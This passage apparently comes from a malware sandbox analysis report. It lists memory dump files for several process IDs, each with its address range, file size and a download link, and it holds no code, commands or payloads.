          • memory/3244-0-0x0000019FDFDD0000-0x0000019FDFDF2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3244-10-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3244-67-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3244-76-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3244-75-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3244-87-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3244-12-0x0000019FC7AD0000-0x0000019FC7AD8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/3380-158-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3380-143-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3380-144-0x0000019AA2DB0000-0x0000019AA2DC0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3392-160-0x00000174B2640000-0x00000174B2650000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3392-147-0x00000174B2640000-0x00000174B2650000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3392-145-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3392-146-0x00000174B2640000-0x00000174B2650000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3392-164-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4108-163-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4108-100-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4108-98-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4108-99-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4108-177-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4108-159-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4108-111-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4108-114-0x000001F668EB0000-0x000001F668EC2000-memory.dmp

            Filesize

            72KB

            Download

          • memory/4528-128-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4528-131-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4528-127-0x0000000000D60000-0x0000000000D72000-memory.dmp

            Filesize

            72KB

            Download